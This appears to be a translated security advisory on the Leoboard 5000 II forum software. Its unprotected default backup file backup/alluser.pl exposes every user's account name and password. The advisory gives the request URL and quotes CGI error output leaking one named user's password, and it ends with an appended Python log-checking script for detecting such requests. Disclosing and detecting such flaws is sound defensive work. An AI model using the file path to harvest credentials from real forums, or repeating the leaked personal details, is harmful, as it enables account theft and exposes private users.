Leoboard Forum
Leoboard Forum (Leoboard 5000 II) has a security vulnerability
Vulnerability description:
Leoboard Forum is a product of the well-known CGI site CGIer.com and is used by many well-known sites in China.
The user backup file, by default "backup/alluser.pl", stores the account names, passwords and other details of every registered user. Because the default installation places no access protection on it at all, a remote attacker can obtain all or part of the registered users' sensitive information.
For example, requesting "http://www.notfound.org/lb5000/cgi-bin/backup/alluser.pl" may either download the file directly or return the following output:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Bareword found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl line 1, near "7456.cgi"
(Missing operator before cgi?)
Number found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl line 1, near "cgi 7456"
(Do you need to predeclare cgi?)
Number found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl line 1, near "7456 226275"
(Missing operator before 226275?)
Bareword found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl line 1, near "226275 Member"
(Missing operator before Member?)
Bareword found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl line 1, near "3 wugang"
(Missing operator before wugang?)
Array found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl li
From the output above it can be seen that the account is "6456", the password is "226275" and the user's name is Wu Gang (吴刚), heh...
In certain situations it can also disclose the physical path on the server:
'E:\Inetpub\wwwroot\china918.net\lb5000\cgi-bin\backup\alluser.pl' script produced no output
or:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Can't open perl script "e:\4esystem\wwwroot\stores\wwwfox\cgi-bin\backup\alluser.pl": No such file or directory
Solution:
1. Restrict access to this file
2. Rename this file to a name that is hard to guess
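As an added example that is not part of the original advisory, the check below lets an administrator find out from the web server's own access log whether the backup directory has been requested and whether those requests were served, produced a CGI error (which, as shown above, can leak record fields or the physical path) or were blocked. It assumes Common Log Format lines; the log lines embedded in it are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample access log lines (Common Log Format); not from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2001:14:02:11 +0800] "GET /lb5000/cgi-bin/leoboard.cgi HTTP/1.0" 200 5123
203.0.113.5 - - [10/Mar/2001:14:02:19 +0800] "GET /lb5000/cgi-bin/backup/alluser.pl HTTP/1.0" 200 8841
198.51.100.7 - - [10/Mar/2001:14:05:40 +0800] "GET /bbs/cgi-bin/backup/alluser.pl HTTP/1.0" 502 611
198.51.100.7 - - [10/Mar/2001:14:05:41 +0800] "GET /bbs/cgi-bin/backup/ HTTP/1.0" 403 224
192.0.2.9 - - [10/Mar/2001:14:09:02 +0800] "GET /lb5000/images/logo.gif HTTP/1.0" 200 3110
"""

# One Common Log Format line: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)
# Any request into the Leoboard backup directory is of interest, not only the
# default file name alluser.pl, since a renamed file would still live there.
BACKUP_PATH_RE = re.compile(r'/cgi-bin/backup(/|$)', re.IGNORECASE)


def find_backup_access(log_text):
    """Return (ip, path, status, verdict) for each request that touched the backup dir."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not BACKUP_PATH_RE.search(m['path']):
            continue
        status = int(m['status'])
        if status == 200:
            verdict = 'EXPOSED'       # file content or CGI output was served to the client
        elif 500 <= status < 600:
            verdict = 'ERROR_LEAK'    # CGI error page: may reveal record fields or the physical path
        else:
            verdict = 'BLOCKED'       # 403/404 etc.: access control or renaming is in effect
        hits.append((m['ip'], m['path'], status, verdict))
    return hits


def summarize(hits):
    """Count verdicts per source IP so that repeated probing from one address stands out."""
    return Counter((ip, verdict) for ip, _, _, verdict in hits)
```

Any EXPOSED or ERROR_LEAK entry means the access restriction from step 1 was not in place at that time and the stored credentials should be treated as compromised.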